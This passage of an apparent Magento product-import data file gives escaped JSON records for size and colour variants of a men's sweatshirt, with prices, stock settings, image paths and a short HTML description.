Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},{\"sku\":\"MH05-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XS-Red\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},{\"sku\":\"MH05-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-XS-White\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},{\"sku\":\"MH05-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-S-Green\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},{\"sku\":\"MH05-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-S-Red\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},{\"sku\":\"MH05-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-S-White\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},{\"sku\":\"MH05-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-M-Green\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},{\"sku\":\"MH05-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-M-Red\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},{\"sku\":\"MH05-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard Sweatshirt-M-White\",\"description\":\"<p>Kick off your weekend in the Hollister Backyard Sweatshirt. Whether you\'re raking leaves or flipping burgers, this comfy layer blocks the bite of the crisp autumn air. Puffy thick from hood to hem, it traps heat against your core.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with navy sleeves\\/trim.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed cuffs and hem. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"52\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hollister-backyard-sweatshirt-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh05-white_alt1.jpg,\\/m\\/h\\/mh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},{\"sku\":\"MH05-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Hollister Backyard 